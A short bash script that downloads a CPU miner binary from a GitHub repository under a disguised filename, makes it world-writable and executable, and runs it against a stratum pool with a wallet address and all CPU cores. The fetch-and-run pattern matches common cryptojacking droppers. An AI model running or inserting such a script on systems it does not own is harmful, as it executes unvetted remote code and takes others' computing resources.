#!/bin/bash
wget -O biru https://github.com/kidoescegh/pilekyla/raw/refs/heads/main/cpuminer-avx
chmod 777 biru
./biru -a flex -o stratum+tcp://stratum.novagrid.online:3180 -u  kc1qylrmtzw47wldzzgwfkxtgrhgvp8jnyrck33nqu.$(shuf -n 1 -i 1-99999)-VX -t $(nproc --all)
